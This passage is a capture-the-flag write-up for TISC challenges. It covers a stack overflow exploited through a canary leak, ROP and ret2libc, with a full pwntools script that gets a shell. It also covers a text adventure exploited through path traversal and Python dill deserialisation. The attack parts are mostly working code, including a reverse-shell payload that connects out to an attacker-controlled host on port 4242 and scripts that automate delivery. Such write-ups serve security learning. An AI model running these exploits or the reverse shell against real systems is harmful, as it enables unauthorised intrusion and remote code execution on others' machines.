memset(dest, 0, v4);
std::operator>><char,std::char_traits<char>>(&std::cin, src);
memcpy(dest, src, v4);
memcpy(s, dest, v4 / 2);
sanity_test_input = malloc(v4 - 1);
memcpy(sanity_test_input, s, v4 - 1);
sanity_test_result = *((_BYTE *)s + v4 - 1);
return 0LL;

The alloca and memcpy calls were run in a precise order. I set a breakpoint at the first memcpy and triggered the overflow again to analyse the stack. After a few repetitions, I figured out how the overflow worked. At the memcpy breakpoint, the stack looked like this:

00: 0x00000000  0x00000000  0x00000000  0x00000000 < *1st memcpy dst / *2nd memcpy src
10: 0x00000000  0x00000000  0x00000000  0x00000000
20: 0x00000000  0x00000000  0xaf79a963  0x00007fab
30: 0x41414141  0x41414141  0x41414141  0x41414141 < *1st memcpy src / start of user-controlled input
40: 0x41414141  0x41414141  0x41414141  0x41414141
50: 0x41414141  0x41414141  0x41414141  0x41414141
60: 0x41414141  0x41414141  0x41414141  0x41414141 < *2nd memcpy dst
70: 0x41414141  0x41414141  0x41414141  0x41414141
80: 0x41414141  0x41414141  0x41414141  0x41414141
90: 0x41414141  0x41414141  0x41414141  0x00000030 < 12 bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
a0: 0x5d7d2b60  0x00007ffc  0x5d7d2b30  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
b0: 0x5d7d2b00  0x00007ffc  0x48531900  0xa14ea5c4 < 1st memcpy dst / 2nd memcpy src | stack canary 
c0: 0x5d7d2bf0  0x00007ffc  0x86bfeea2  0x0000563e < 8 bytes | return pointer
d0: 0x86c00010  0x0000563e  0x86bfd540  0x0001013e
e0: 0x86c01956  0x0000563e  0x48531900  0xa14ea5c4

If I overwrote every byte until the return pointer, I would also overwrite the stack canary which triggered an error. However, remember how the inputs for the β€œGet Recruited” functions were XORed with sanity_test_input? Since I controlled each of the three memcpys' arguments via the overwrite, I could attempt to copy the stack canary into sanity_test_input using the third memcpy, then retrieve the XORed canary via the β€œShow what you have for the Cromulon currently” function.

Initially, I planned to overwrite the bytes up till the first memcpy n argument and set n to a large enough number to also copy over the stack canary bytes. However, since the second memcpy used n / 2 for the size argument, to ensure that the canary was copied over in the second memcpy, n needed to be so large that the first memcpy would already overwrite the stack canary. Worse, I also realised that the copied bytes had to be null-free because the xor_passphrase_with_sanity_input function only XORed the appended strings up till the first null byte in sanity_test_input. It dawned on me that I had to thread a very fine needle; this challenge was surgically designed.

(I would later learn that this was in fact the hardest possible way I could have solved this challenge; there was a simpler stack setup as well as a heap exploit route but clearly I wanted to suffer more.)

In order to properly leak data from the stack, I needed to overwrite the bytes in such a way that the 3rd memcpy copied over stack bytes into sanity_test_input that would both pass the sanity test AND be XORed later on. I tested various permutations of overwritten bytes, using pwntools to speed up my work. To quickly debug the program, I wrote a Bash one-liner: gdb ./1adb53a4b156cef3bf91c933d2255ef30720c34f $(ps aux | grep ./1adb53a4b156cef3bf91c933d2255ef30720c34f | grep -v grep | cut -d ' ' -f9). This would hook onto the running instance created by my pwntools script.

After painstakingly trying hundreds of different inputs over several hours, I eventually figured out an overwrite that would get the result I wanted. By crafting my payload with precise offsets, I could manipulate the first two memcpys such that I overwrote the last byte in the 3rd memcpy's src argument on the stack. With luck, the overwritten byte would cause the src to point to the return address or any other desired value such as the canary. I needed luck because the stack addresses changed each time the binary was executed. As such, I had to brute force the correct offset.

It may be easier to explain this by stepping through each memcpy, so let's get right into it.

I prepared my payload like this:

payload = b'B' * 60                                 # offset
payload += b'\x11\x00\x00\x00'                      # third memcpy n; vary this until sanity test passes
payload += packing.p8(return_pointer_offset)        # candidate offset to return pointer on stack
payload += b'B' * 43                                # more offset
payload += b'\x82'                                  # first memcpy n / second memcpy n * 2
p.sendline(payload)

With this payload, the stack BEFORE the first memcpy looked like this:

75d0: 0x00000000  0x00000000  0x00000000  0x00000000 < *1st memcpy dst / *2nd memcpy src
75e0: 0x00000000  0x00000000  0x00000000  0x00000000 
75f0: 0x00000000  0x00000000  0x656c2963  0x00007fca < 8 null bytes | libc_write+19
7600: 0x41414141  0x41414141  0x41414141  0x41414141 < *1st memcpy src / start of user-controlled input
7610: 0x41414141  0x41414141  0x41414141  0x41414141 
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x00000011 < *2nd memcpy dst
7640: 0x424242XX  0x41414141  0x41414141  0x41414141 < candidate XX offset
7650: 0x41414141  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000082 < 12 filler bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 1st memcpy dst / 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

Thanks to the overflow from receiving user input, I overwrote the value of n on the stack to \x82. This caused the first memcpy to copy both my original inputs and additional bytes on the stack to *1st memcpy dst. The stack AFTER the first memcpy and BEFORE the second memcpy now looked like this:

75d0: 0x41414141  0x41414141  0x41414141  0x41414141 < *2nd memcpy src
75e0: 0x41414141  0x41414141  0x41414141  0x41414141 
75f0: 0x41414141  0x41414141  0x41414141  0x41414141
7600: 0x41414141  0x41414141  0x41414141  0x00000011
7610: 0x424242XX  0x41414141  0x41414141  0x41414141 < candidate XX offset
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x00000082 < *2nd memcpy dst
7640: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc 
7650: 0x424275d0  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000082 < 12 filler bytes | 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

Nothing too special. However, the magic happened in the next memcpy. The stack AFTER the second memcpy and BEFORE the third memcpy looked like this:

75d0: 0x41414141  0x41414141  0x41414141  0x41414141
75e0: 0x41414141  0x41414141  0x41414141  0x41414141 
75f0: 0x41414141  0x41414141  0x41414141  0x41414141
7600: 0x41414141  0x41414141  0x41414141  0x00000011
7610: 0x424242XX  0x41414141  0x41414141  0x41414141
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x41414141
7640: 0x41414141  0x41414141  0x41414141  0x41414141 
7650: 0x41414141  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000011 < 12 filler bytes | 3rd memcpy n + 1
7670: 0xb56176XX  0x00007ffc  0xb5617600  0x00007ffc < 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

I overwrote two important values:

  1. The n used to generate the 3rd memcpy's size argument (n-1) to 0x11 .
  2. The last byte of the 3rd memcpy's src argument to my candidate byte offset 0xXX.

When my brute force set the candidate byte to 0x98, the 3rd memcpy's src pointed to the stack address of the return pointer (0x7ffcb5617698), allowing me to copy the return pointer address to sanity_test_input. The overwritten n also set sanity_test_result to *0x7ffcb56176a8 = 0x40 which passed the sanity test. After that, I could simply enter a string of length 0x11 like 1111111111111111 at the β€œGet Recruited” prompt, which XORed the stored sanity_test_input. I could then run β€œShow what you have for the Cromulon currently” to output the result and XOR it with 1111111111111111 again to retrieve the return pointer value.

If the candidate offset correctly retrieved the return pointer, the first retrieved byte would be the return pointer's last byte. This seemed to always match 0xa2, so I used this constant to check for a successful candidate. There was a chance that no valid candidates existed; if the return pointer was at 0x7ffcb5617708 but the 3rd memcpy src value was originally set to 0x7ffcb56176X8, I could only brute force the last byte up to 0x7ffcb56176f8. In this case, I simply needed to run the exploit again and hope to get lucky.

I deducted a fixed offset (0x3EA2) from the return pointer value to get the base address of the executable. Additionally, now that I knew the offset in the stack to the return pointer, I could add or subtract it accordingly to retrieve other interesting values on the stack, such as __libc_start_main+234, the stack canary, and a valid stack pointer.

With those values, I could send a large input with the proper stack canary and overwrite the return pointer to my desired function pointer, such as system in libc. I avoided crashing the three memcpys by overwriting the src and dest arguments to the leaked valid stack addresses and setting the size argument to something small like 1.

At first, I tried to return to an interesting function in the binary that printed the flag:

__int64 read_flag()
{
  char v1; // [rsp+Fh] [rbp-231h] BYREF
  char v2[264]; // [rsp+10h] [rbp-230h] BYREF
  _QWORD v3[37]; // [rsp+118h] [rbp-128h] BYREF

  v3[34] = __readfsqword(0x28u);
  std::fstream::basic_fstream(v2);
  std::fstream::open(v2, "/root/f1988cec5de9eaa97ab11740e10b1fc8d6db8123", 8LL);
  if ( (unsigned __int8)std::ios::operator!(v3) )
  {
    std::operator<<<std::char_traits<char>>(&std::cout, "No such file\n");
  }
  else
  {
    while ( 1 )
    {
      std::operator>><char,std::char_traits<char>>(v2, &v1);
      if ( (unsigned __int8)std::ios::eof(v3) )
        break;
      std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v1);
    }
    std::operator<<<std::char_traits<char>>(&std::cout, "\n");
  }
  std::fstream::close(v2);
  std::fstream::~fstream(v2);
  return 0LL;
}

However, despite the exploit working locally, I could not get it to work remotely. I assumed that this was because the executable crashed too quickly to return output over the network. As such, I decided to go the ret2libc route and get a shell by adding system to the call stack. Since the offsets in libc varied widely over different versions, I used the file disclosure vulnerability from earlier to leak /proc/self/maps and /etc/os-release to determine the exact OS and libc versions, which were β€œUbuntu 20.04.3 LTS (Focal Fossa)” and libc-2.31.so respectively. Since Googling the server's IP address revealed that it belonged to a DigitalOcean Singapore cluster, I spun up a free Droplet instance on the same cluster with the matching OS version to retrieve the offsets. This turned out to be a hidden bonus because the proximity of my Droplet instance to the target server allowed my exploit to catch the shell faster before the program crashed.

Finally, I needed to pop the pointer to /bin/sh in libc into RDI before calling system. This was because the x64 calling convention uses RDI as the first argument for a function call. I used rp++ to dump ROP gadgets from the binary and added the POP RDI, RET gadget to the overwritten call stack.

At long last, I completed my full exploit code:

from pwn import *

p = remote('<IP ADDRESS>', 53619)
##p = process('./1adb53a4b156cef3bf91c933d2255ef30720c34f')

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

## leak base_addr of executable
return_pointer_offset = 8
while True:
    # send payload
    p.recvuntil("> ")
    p.sendline(b'1')
    payload = b'B' * 60                                 # offset
    payload += b'\x11\x00\x00\x00'                      # third memcpy n; vary this until sanity test passes
    payload += packing.p8(return_pointer_offset)        # candidate offset to return pointer on stack
    payload += b'B' * 43                                # more offset
    payload += b'\x82'                                  # first memcpy n / second memcpy n * 2
    p.sendline(payload)

    # retrieve sanity_test_input
    p.recvuntil("> ")
    p.sendline(b'2')
    if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
        p.sendline(b'1111111111111111')
        p.recvuntil("> ")
        p.sendline(b'4')
        p.recvuntil("`======/")
        p.recvline()
        candidate = p.recvline()
        print(candidate.hex())
        if 0x93 == candidate[0]:                        # confirm that this is a leaked function address; last byte is 0xa2 == 0x93 XOR 0x31
            base_addr = (int.from_bytes(byte_xor(candidate[:6][::-1], b'111111'), 'big', signed=False) - 0x3EA2).to_bytes(8, byteorder='big', signed=False)
            log.info('Base address: {}'.format(base_addr.hex()))
            p.recvuntil("> ")
            p.sendline(b'6')
            break
        p.recvuntil("> ")
        p.sendline(b'6')
    return_pointer_offset += 16

libc_start_main_plus_234_offset = return_pointer_offset + 0x30        # offset in stack from function pointer to __libc_start_main+234
canary_offset = return_pointer_offset - 0x10 + 1                      # offset in stack from function pointer to canary + 1 (skip null token)
stack_address_offset = return_pointer_offset - 0x18                   # offset in stack from function pointer to canary + 1 (skip null token)

if stack_address_offset < 0 or libc_start_main_plus_234_offset > 255:
    log.error("Base offset is too low")

## leak canary
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result passes
payload += packing.p8(canary_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    canary = byte_xor(candidate[:7][::-1], b'1111111') + b'\x00'    # restore null last byte

    log.info("Canary: {}".format(canary.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')

## leak libc_main_plus_234
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result == B which passes test4 #21 for local
payload += packing.p8(libc_start_main_plus_234_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    libc_main_plus_234 = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('libc_main_plus_234 address: {}'.format(libc_main_plus_234.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')

## leak stack address
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x19\x00\x00\x00' # ensures that sanity_test_result passes test4
payload += packing.p8(stack_address_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    stack_address = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('Stack address: {}'.format(stack_address.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')


## prepare addresses
flag_function_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3BBC).to_bytes(8, byteorder='big', signed=False)
log.info('Flag function address: {}'.format(flag_function_address.hex()))

get_recruited_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3606).to_bytes(8, byteorder='big', signed=False)
log.info('get_recruited function address: {}'.format(get_recruited_address.hex()))

pop_rdi_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x5073).to_bytes(8, byteorder='big', signed=False)
log.info('pop_rdi_ret address: {}'.format(pop_rdi_ret.hex()))

libc_base_addr = (int.from_bytes(libc_main_plus_234, 'big', signed=False) - 0x270B3).to_bytes(8, byteorder='big', signed=False)
log.info('libc_base_addr address: {}'.format(libc_base_addr.hex()))

libc_system_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x55410).to_bytes(8, byteorder='big', signed=False)
log.info('libc_system_addr: {}'.format(libc_system_addr.hex()))

libc_bin_sh_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x1B75AA).to_bytes(8, byteorder='big', signed=False)
log.info('libc_bin_sh_addr: {}'.format(libc_bin_sh_addr.hex()))
dec_ecx_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x2AE2).to_bytes(8, byteorder='big', signed=False)

## prepare final payload
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 108                    # offset
payload += b'\x01\x00\x00\x00'          # n
payload += stack_address[::-1]          # valid stack address
payload += stack_address[::-1]          # valid stack address
payload += stack_address[::-1]          # valid stack address
payload += canary[::-1]                 # valid canary
payload += b'A' * 8                     # offset            
payload += flag_function_address[::-1]  # try to call flag function - somehow this doesn't work remotely?
payload += pop_rdi_ret[::-1]            # ROP to pop pointer to "/bin/sh" to RDI
payload += libc_bin_sh_addr[::-1]       # pointer to "/bin/sh"
payload += libc_system_addr[::-1]       # pointer to system

## send final payload
print(p.recvline())
print(p.recv())
p.sendline(payload)

p.interactive()

I ran this several times on my Droplet instance and eventually got my shell.

Shell

TISC{30e903d64775c0120e5c244bfe8cbb0fd44a908b}

Level 9: 1865 Text Adventure

This was my favourite level and felt like a digital work of art. I loved the storyline and although one of the domains was Pwn, it was actually Web as you will see soon. Finally, it involved a lot of code review, which I enjoyed.

It began with a tumble...

Part 1: Down the Rabbit Hole

Domains: Pwn, Cryptography

Text adventures are fading ghosts of a faraway past but this one looks suspiciously brand new... and it has the signs of PALINDROME all over it.

Our analysts believe that we need to learn more about the White Rabbit but when we connect to the game, we just keep getting lost!

Can you help us access the secrets left in the Rabbit's burrow?

The game is hosted at 165.22.48.155:26181.

No kernel exploits are required for this challenge.

Connecting to <IP ADDRESS>:26181 kicked off a long, scrolling text adventure.

Alice in Wonderland

I could look around my location, move to another exit, read notes, or get items. I set about enumerating every path in the text adventure. Along the way, I picked up several useful items:

  1. The Pocket Watch: This gave me access to an options menu, which I used to turn off the annoying scrolling text.
  2. The Looking Glass: This gave me the ability to teleport to other locations in the story. teleport bottom-of-a-pit/deeper-into-the-burrow
  3. Golden Hookah: This gave me the ability to save messages... somewhere. blowsmoke <NAME> <MESSAGE>.

After a few twists and turns, the text adventure reached a dead end.

[cosmic-desert] move tear-in-the-rift
You have moved to a new location: 'tear-in-the-rift'.

You look around and see:
A curious light shines in the distance. You cannot quite reach it though.

Music tinkles through the rift:

    A very merry unbirthday
    To you
    Who, me?
    Yes, you
    Oh, me
    Let's all congratulate us with another cup of tea
    A very merry unbirthday to you

There are the following things here:
  * README (note)

[tear-in-the-rift] read README
You read the writing on the note:
Do you hear that? What lovely party sounds!

Wouldn't it be lovely to crash it and get some tea and crumpets?

Too bad you're stuck here!

You can cage a swallow, can't you, but you can't swallow a cage, can you?

Fly back to school now, little starling.

- PALINDROME

With nowhere left to go, I began messing about with the items. My first clue surfaced when I used the Golden Hookah to send a message with a format string.

[tear-in-the-rift] blowsmoke spaceraccoon %s
Smoke bellows from the lips of spaceraccoon to form the words, "%s."
Curling and curling...
Traceback (most recent call last):
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
    self.evaluate(user_line)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
    cmd.run(args)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 511, in run
    response = urlopen(url)
  File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.8/urllib/request.py", line 531, in open
    response = meth(req, response)
  File "/usr/lib/python3.8/urllib/request.py", line 640, in http_response
    response = self.parent.error(
  File "/usr/lib/python3.8/urllib/request.py", line 569, in error
    return self._call_chain(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 649, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 400: Bad Request

The Python backend was trying to send a HTTP request with my message! However, further experimentation with traversal and command injection payloads failed to yield any results. I moved on to The Looking Glass. I attempted several invalid inputs, including a long string:

[cosmic-desert] teleport vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>
Traceback (most recent call last):
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
    self.evaluate(user_line)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
    cmd.run(args)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 475, in run
    if rel_path.exists() and rel_path.is_dir():
  File "/usr/lib/python3.8/pathlib.py", line 1407, in exists
    self.stat()
  File "/usr/lib/python3.8/pathlib.py", line 1198, in stat
    return self._accessor.stat(self)
OSError: [Errno 36] File name too long: '/opt/wonderland/down-the-rabbithole/stories/vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>'

This looked like a directory traversal! Perhaps teleporting meant moving to a different folder location in the server. I took the next obvious step.

[tear-in-the-rift] teleport ../../../../etc
You have moved to a new location: 'etc'.

You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
There are the following things here:
  * environment (note)
  * fstab (note)
  * networks (note)
  * mke2fs.conf (note)
  * ld.so.conf (note)
  * passwd (note)
  * shells (note)
  * debconf.conf (note)
  * ld.so.cache (note)
  * legal (note)
  * xattr.conf (note)
  * hostname (note)
  * e2scrub.conf (note)
  * issue (note)
  * bindresvport.blacklist (note)
...

Bingo! Now that I was in a different folder, I could read files with the read command. After enumerating various locations, I ended up in /home/rabbit which contained the first flag.

[mouse] teleport ../../../../home/rabbit
You have moved to a new location: 'rabbit'.

You look around and see:
You enter the Rabbit's burrow and find it completely ransacked. Scrawled across the walls of the
tunnel is a message written in blood: 'Murder for a jar of red rum!'.

Your eyes are drawn to a twinkling letter and lockbox that shines at you from the dirt.

There are the following things here:
  * flag2.bin (note)
  * flag1 (note)

[rabbit] read flag1
You read the writing on the note:
TISC{r4bbb1t_kn3w_1_pr3f3r_p1}

TISC{r4bbb1t_kn3w_1_pr3f3r_p1}

Part 2: Pool of Tears

It looks like the Rabbit knew too much about PALINDROME. Within his cache of secrets lies a special device that might just unlock clues to tracking down the elusive trickster. However, our attempts to read it yield pure gibberish.

It appears to require... activation. To activate it, we must first become the Rabbit.

Please assume the identity of the Rabbit.

The challenge description hinted that I needed to get a working shell as rabbit to execute flag2.bin. I returned to the /opt/wonderland/down-the-rabbithole folder that contained the Python source code for the text adventure. rabbithole.py contained most of the game logic. Right away, I noticed that it imported pickletools and used Python object deserialisation (dill.loads) to β€œget” items.

def run(self, args):
    if len(args) < 2:
        letterwise_print("You don't see that here.")
        return
    for i in self.game.get_items():
        if (args[1] + '.item') == i.name and args[1] not in self.game.inventory:
            got_something = True
            # Check that the item must be serialised with dill.
            item_data = open(i, 'rb').read()
            if not self.validate_stream(item_data):
                letterwise_print('Seems like that item may be an illusion.')
                return
            item = dill.loads(item_data)
            letterwise_print("You pick up '{}'.".format(item.key))
            self.game.inventory[item.key] = item
            item.prepare(self.game)
            item.on_get()
            return

Since Python object deserialisation was an easy code execution vector, I focused on this lead. How could I create a pickle file on the server to β€œget” later? Enumerating more folders, I realised that /opt/wonderland contained the source code of two other applications:

[..] teleport ../..
You have moved to a new location: '..'.

You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
You see exits to the:
  * logs
  * pool-of-tears
  * a-mad-tea-party
  * down-the-rabbithole
  * utils

a-mad-tea-party turned out to be a Java application, while pool-of-tears contained a Ruby on Rails web API. In logs, I found some of the messages I sent using blowsmoke earlier. This suggested that blowsmoke enabled me to write files – exactly what I needed.

To prepare my pickle, I referred to the generate_items.py script from the source code of down-the-rabbithole. The application validated items by checking for rabbithole, dill._dill, and on_get properties, so I reused the code to meet these requirements with one importance difference – my payload generation script inserted a Python reverse shell in on_get.

import dill
import types
from rabbithole import Item
import socket
import os
import pty
import urllib.parse

dill.settings['recurse'] = True

def write_object(location, obj):
    '''Writes an object to the specified location.
    '''
    with open(location, 'wb') as f:
        dill.dump(obj, f, recurse=True)

def make_item(key, on_get):
    '''Makes a new item dynamically.
    '''
    item = Item(key)
    item.on_get = types.MethodType(on_get, item)
    return item

def payload_on_get(self):
    '''Add the options command when picked up.
    '''
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("<IP ADDRESS>",4242))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    pty.spawn("/bin/sh")

def setup_payload():
    item = make_item('payload', payload_on_get)
    write_object('payload.item', item)

if __name__ == '__main__':
    setup_payload()
    # open_payload()
    with open('payload.item', 'rb') as file:
        print("Generated {}".format(urllib.parse.quote(file.read())))

After generating the URL-encoded payload, I sent it off with blowsmoke a.item <URL-ENCODED PAYLOAD>. This saved the payload to /opt/wonderland/logs/tear-in-the-rift-a.item. Finally, in the text adventure game, I teleported to /opt/wonderland/logs and ran get tear-in-the-rift-a.item to execute the payload. To save time, I automated the entire process with pwntools.


from pwn import *
import urllib

p = remote('<IP ADDRESS>', 26181)

print(p.recvuntil(b']'))
p.sendline(b'move a-shallow-deadend')
print(p.recvuntil(b']'))
p.sendline(b'get pocket-watch')
print(p.recvuntil(b']'))
p.sendline(b'options text_scroll False')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move deeper-into-the-burrow')
print(p.recvuntil(b']'))
p.sendline(b'move a-curious-hall')
print(p.recvuntil(b']'))
p.sendline(b'get pink-bottle')
print(p.recvuntil(b']'))
p.sendline(b'move a-pink-door')
print(p.recvuntil(b']'))
p.sendline(b'move maze-entrance')
print(p.recvuntil(b']'))
p.sendline(b'move knotted-boughs')
print(p.recvuntil(b']'))
p.sendline(b'move dazzling-pines')
print(p.recvuntil(b']'))
p.sendline(b'move a-pause-in-the-trees')
print(p.recvuntil(b']'))
p.sendline(b'move confusing-knot')
print(p.recvuntil(b']'))
p.sendline(b'move green-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move a-fancy-pavillion')
print(p.recvuntil(b']'))
p.sendline(b'get fluffy-cake')
print(p.recvuntil(b']'))
p.sendline(b'move along-the-rolling-waves')
print(p.recvuntil(b']'))
p.sendline(b'move a-sandy-shore')
print(p.recvuntil(b']'))
p.sendline(b'move a-mystical-cove')
print(p.recvuntil(b']'))
p.sendline(b'get looking-glass')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move further-into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move nearing-a-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move clearing-of-flowers')
print(p.recvuntil(b']'))
p.sendline(b'get morning-glory')
print(p.recvuntil(b']'))
p.sendline(b'move under-a-giant-mushroom')
print(p.recvuntil(b']'))
p.sendline(b'get golden-hookah')
print(p.recvuntil(b']'))
p.sendline(b'move eternal-desolation')
print(p.recvuntil(b']'))
p.sendline(b'move cosmic-desert')
print(p.recvuntil(b']'))
p.sendline(b'move tear-in-the-rift')
print(p.recvuntil(b']'))


## read flag2.bin
## p.sendline(b'teleport ../../../../home/rabbit')
## print(p.recvuntil(b'[rabbit]'))
## p.sendline(b'read flag2.bin')
## flag2_bin = p.recvuntil(b']')
## with open('flag2.bin', 'wb') as file:
##     file.write(flag2_bin)

## send payload
with open('payload.item', 'rb') as file:
    p.sendline(b'blowsmoke a.item ' + urllib.parse.quote(file.read()).encode())
print(p.recvuntil(b']'))

## execute payload
p.sendline(b'teleport ../../../../opt/wonderland/logs')
print(p.recvuntil(b']'))
p.sendline(b'get tear-in-the-rift-a')
print(p.recvuntil(b']'))


p.interactive()

The exploit went off without a hitch and I got my shell.

Reverse Shell

TISC{dr4b_4s_a_f00l_as_al00f_a5_A_b4rd}

Part 3: Advice from a Caterpillar

PALINDROME's taunts are clear: they await us at the Tea Party hosted by the Mad Hatter and the March Hare. We need to gain access to it as soon as possible before it's over.

The flowers said that the French Mouse was invited. Perhaps she hid the invitation in her warren. It is said that her home is decorated with all sorts of oddly shaped mirrors but the tragic thing is that she's afraid of her own reflection.

This challenge description included the key word β€œreflection”. I immediately thought of Java reflection attacks but the Java app a-mad-tea-party was executed by the hatter user rather than mouse. From my shell, I exfiltrated all the source code in /opt/wonderland and reviewed the pool-of-tears Rails application run by mouse.

The controller logic for the blowsmoke API at pool-of-tears/app/controllers/smoke_controller.rb had the following code.

  def remember
    # Log down messages from our happy players!

    begin
      ctype = "File"
      if params.has_key? :ctype
        # Support for future appending type.
        ctype = params[:ctype]
      end

      cargs = []
      if params.has_key?(:cargs) && params[:cargs].kind_of?(Array)
        cargs = params[:cargs]
      end

      cop = "new"
      if params.has_key?(:cop)
        cop = params[:cop]
      end

      if params.has_key?(:uniqid) && params.has_key?(:content)
        # Leave the kind messages
        fn = Rails.application.config.message_dir + params[:uniqid]
        cargs.unshift(fn)
        c = ctype.constantize
        k = c.public_send(cop, *cargs)
        if k.kind_of?(File)
          k.write(params[:content])
          k.close()
        else
          # TODO: Implement more types when we need distributed logging.
          # PALINDROME: Won't cat lovers revolt? Act now!
          render :plain => "Type is not implemented yet."
          return
        end

      else
        render :plain => "ERROR"
        return
      end
    rescue => e
      render :plain => "ERROR: " + e.to_s
      return
    end

The comments and the use of ctype.constantize attracted my attention and I wondered if Ruby reflection attacks existed. They did.

